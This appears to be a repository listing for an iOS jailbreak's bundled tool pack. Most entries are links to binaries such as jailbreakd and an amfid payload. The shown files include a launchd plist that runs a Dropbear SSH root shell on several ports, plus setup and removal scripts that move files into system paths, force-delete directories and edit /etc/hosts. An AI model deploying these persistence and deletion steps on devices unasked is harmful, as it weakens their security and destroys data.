--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/chmod
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/cp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/cp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/date:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/date
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/dd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/dd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/hostname:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/hostname
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/jailbreakd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/jailbreakd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/jbclient:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/jbclient
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/kill:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/kill
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/launchctl
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/launchctl_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/launchctl_
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/ln:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/ln
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/ls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/ls
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/mkdir:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/mkdir
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/mv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/mv
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/pwd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/pwd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rm
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rmdir:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rmdir
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rootme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rootme
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sh
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sleep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sleep
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/stty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/stty
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sync:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sync
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/zsh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/zsh
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/default.ent:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | platform-application
5 |
6 | com.apple.private.security.container-required
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/dropbear.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | Dropbear
7 | Program
8 | REPLACE_ME/usr/local/bin/dropbear
9 | ProgramArguments
10 |
11 | REPLACE_ME/usr/local/bin/dropbear
12 | -R
13 | --shell
14 | REPLACE_ME/bin/bash
15 | -E
16 | -p
17 | 22
18 | -p
19 | 2222
20 | -p
21 | 4242
22 |
23 | RunAtLoad
24 |
25 | KeepAlive
26 |
27 | StandardOutPath
28 | /var/log/dropbear.log
29 | StandardErrorPath
30 | /var/log/dropbear_error.log
31 |
32 |
33 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/alternatives/README:
--------------------------------------------------------------------------------
1 | Please read the update-alternatives(8) man page for information on this
2 | directory and its contents.
3 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/sources.list.d/saurik.list:
--------------------------------------------------------------------------------
1 | # DO NOT EDIT | This is the story of a time long ago, A time of myth and legend, when the Earth was still young.
2 | # The ancient gods were petty and cruel, and they plagued mankind with suffering and beseiged them with terrors.
3 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/bigboss.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/bigboss.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/modmyi.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/modmyi.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/saurik.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/saurik.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/zodttd.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/zodttd.gpg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/motd:
--------------------------------------------------------------------------------
1 | cEnjoy SSH! ~@Jakeashacks
2 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/profile:
--------------------------------------------------------------------------------
1 | export PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin/X11:/usr/games:REPLACE_ME/usr/local/sbin:REPLACE_ME/usr/local/bin:REPLACE_ME/usr/sbin:REPLACE_ME/usr/bin:REPLACE_ME/sbin:REPLACE_ME/bin'
2 | export PS1='\h:\w \u\$ '
3 | REPLACE_ME/bin/bash
4 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/zshrc:
--------------------------------------------------------------------------------
1 | #
2 | # /etc/zshrc is sourced in interactive shells. It
3 | # should contain commands to set up aliases, functions,
4 | # options, key bindings, etc.
5 | #
6 |
7 | watch=(all)
8 |
9 | export PATH=$PATH:/jb/usr/bin:/jb/bin:/jb/bin:/jb/sbin:/jb/usr/sbin:/usr/local/bin
10 |
11 |
12 | if [ -f ~/2.DO ]; then
13 | cat ~/2.DO
14 | fi
15 | if [ `id -gn` = `id -un` -a `id -u` -gt 14 ]; then
16 | umask 002
17 | else
18 | umask 022
19 | fi
20 |
21 | # Set up aliases
22 | alias mv='nocorrect mv' # no spelling correction on mv
23 | alias cp='nocorrect cp' # no spelling correction on cp
24 | alias df='df -h' # More human readable
25 | alias mkdir='nocorrect mkdir' # no spelling correction on mkdir
26 | alias more='less'
27 | alias ~='cd ~'
28 | alias grep='grep --color=auto' # Colors on Grep
29 |
30 |
31 | # Shell functions
32 | setenv() { export $1=$2 } # csh compatibility
33 | # Johnny's opts...
34 | setopt correct
35 | setopt correct_all
36 | setopt nohup
37 | #set correct=cmd
38 |
39 | # Some environment variables
40 | path=($path $HOME/bin)
41 | export USER=`id -un`
42 | export LOGNAME=$USER
43 | export HOSTNAME=`uname -n`
44 | export MAIL=/var/spool/mail/$USER
45 |
46 |
47 |
48 | # Set prompts
49 | #PROMPT=%b%S"$USER@%m %{[33m%}(%~) %#%s%B" # default prompt
50 | #RPROMPT="%B%T%b" # prompt for right side of screen
51 | #SPROMPT='You meant %r, Right? '
52 |
53 |
54 | #
55 |
56 | RPROMPT="%B%{[34m%}%T%{[0m%}%b"
57 | PROMPT=%b%S"$USER@%m %{[32m%}(%~) %#%s%B" # default prompt
58 |
59 | #
60 | # below works, but if no zsh files are in /etc/profile.d it complains
61 | # everytime zsh is run. Commenting out for now.
62 | #
63 | # run other components
64 | #for i in /etc/profile.d/*.zsh
65 | #do
66 | # source $i
67 | #done
68 |
69 | # bindkey -v # vi key bindings
70 | bindkey -e # emacs key bindings
71 | bindkey ' ' magic-space # also do history expansino on space
72 |
73 | #------------------------------------------------------------------------
74 | # Define LINUX Color Styles Here!
75 | #------------------------------------------------------------------------
76 |
77 | LS_COLORS="no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:\
78 | cd=40;33;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:\
79 | *.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:\
80 | *.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:\
81 | *.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.README=05;1:*.DO=05;1:*.avi=00;32:*.mp3=00;33:"
82 | export LS_COLORS
83 |
84 | LS_OPTIONS="--color=tty -F -T 0"
85 | export LS_OPTIONS
86 | export CLICOLOR=1
87 | alias d=dir
88 | alias v=vdir
89 | alias vi=vim
90 |
91 | PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"'
92 |
93 | export MANPATH=/usr/share/man:/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/share/man
94 |
95 | export LESS_TERMCAP_mb=$'\E[01;31m'
96 | export LESS_TERMCAP_md=$'\E[01;31m'
97 | export LESS_TERMCAP_me=$'\E[0m'
98 | export LESS_TERMCAP_se=$'\E[0m'
99 | export LESS_TERMCAP_so=$'\E[01;44;33m'
100 | export LESS_TERMCAP_ue=$'\E[0m'
101 | export LESS_TERMCAP_us=$'\E[01;32m'
102 | export LESS=-r
103 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/makeMeAtHome.sh:
--------------------------------------------------------------------------------
1 | #
2 | # Sets up J's favorite environment
3 | #
4 | # These are perfectly safe and reversible
5 | #
6 |
7 | export PATH=/jb/usr/bin:/jb/bin:/jb/sbin:/jb/usr/sbin:/jb/usr/local/bin:
8 |
9 |
10 | echo Enabling SCP
11 | mv /jb/usr/bin/scp /usr/bin/scp
12 |
13 | echo Setting up ZSH Support files
14 | mkdir -p /usr/local/lib/zsh/5.0.8/zsh
15 | mv /jb/usr/local/lib/zsh/5.0.8/zsh/* /usr/local/lib/zsh/5.0.8/zsh
16 | mv /jb/bin/zsh /bin
17 | mv /jb/etc/zshrc /etc
18 |
19 | echo Setting up Terminfo Database
20 | mkdir -p /usr/share/terminfo
21 | mv /jb/usr/share/terminfo/* /usr/share/terminfo/
22 |
23 | echo Moving J-tools to /usr/local/bin
24 | mkdir -p /usr/local/bin
25 | mv /jb/usr/local/bin/* /usr/local/bin
26 |
27 |
28 | echo It\'s fine if you saw errors that some directories were not empty.
29 | echo now feel free to run \'zsh\' instead of bash
30 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/profile:
--------------------------------------------------------------------------------
1 | export PS1='$USER@$HOST ($PWD)# '
2 |
3 | export PATH=/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
4 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/removeMe.sh:
--------------------------------------------------------------------------------
1 | echo Removing Message-of-the-Day
2 | /jb/bin/rm /etc/motd
3 | echo Removing /.cydia_no_stash
4 | /jb/bin/rm /.cydia_no_stash
5 | echo Removing Cydia
6 | /jb/bin/rm -fR /Applications/Cydia.app/
7 | echo Removing terminfo database
8 | /jb/bin/rm -fR /usr/share/terminfo
9 | echo Removing ZSH support files
10 | /jb/bin/rm -fR /usr/local/lib/zsh
11 | /jb/bin/rm /bin/zsh
12 | /jb/bin/rm /etc/zshrc
13 |
14 | echo Removing J-tools from /usr/local/bin
15 | /jb/bin/rm -fR /usr/local/bin
16 |
17 | echo Removing /usr/bin/scp as well. This means you can\'t use WinSCP, etc anymore.
18 | /jb/bin/rm /usr/bin/scp
19 |
20 | echo Reenabling mesu.apple.com \(for auto-updates and/or stock app downloads\)
21 | /jb/bin/cat /etc/hosts | /jb/bin/grep -v mesu > /tmp/hosts.tmp
22 | /jb/bin/mv /tmp/hosts.tmp /etc/hosts
23 |
24 | echo Removing /jb
25 | /jb/bin/rm -fR /jb
26 |
27 | echo Sad to see you go.. but - That\'s it - no traces should be left.
28 | echo You cannot do anything else in the shell since the binaries have all been removed.
29 | echo Reboot your device to stop dropbear.
30 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/dmesg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/dmesg
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/ifconfig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/ifconfig
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/kextunload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/kextunload
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/md5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/md5
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/mknod:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/mknod
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/ping:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/ping
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/shutdown:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/shutdown
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/umount:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/umount
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/test
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/amfid_payload.dylib
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/arch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/arch
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/chflags:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/chflags
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/clear:
--------------------------------------------------------------------------------
1 | printf "\e[1;1H\e[2J"
2 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/cut:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/cut
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/du:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/du
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/false:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/false
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/find:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/find
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/fs_usage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/fs_usage
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/grep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/grep
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/gunzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/gunzip
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/gzip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/gzip
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/head:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/head
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/hexdump:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/hexdump
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/hostinfo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/hostinfo
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/id:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/id
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/inject_criticald:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/inject_criticald
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/killall:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/killall
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/less:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/less
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/login:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/login
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/lsmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/lsmp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/more:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/more
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/nano:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/nano
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/nohup:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/nohup
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/passwd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/passwd
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/plconvert:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/plconvert
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/printf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/printf
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/renice:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/renice
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/reset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/reset
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sc_usage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sc_usage
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/scp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/scp
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/screen:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/screen
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/script:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/script
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sed:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sed
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/seq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/seq
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/split:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/split
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/sqlite3
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/stat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/stat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/syslog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/syslog
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tail:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tail
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tar
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tee:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tee
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/time:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/time
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/true:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/true
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/tset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/tset
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/uicache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/bin/uicache
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/bin/uname:
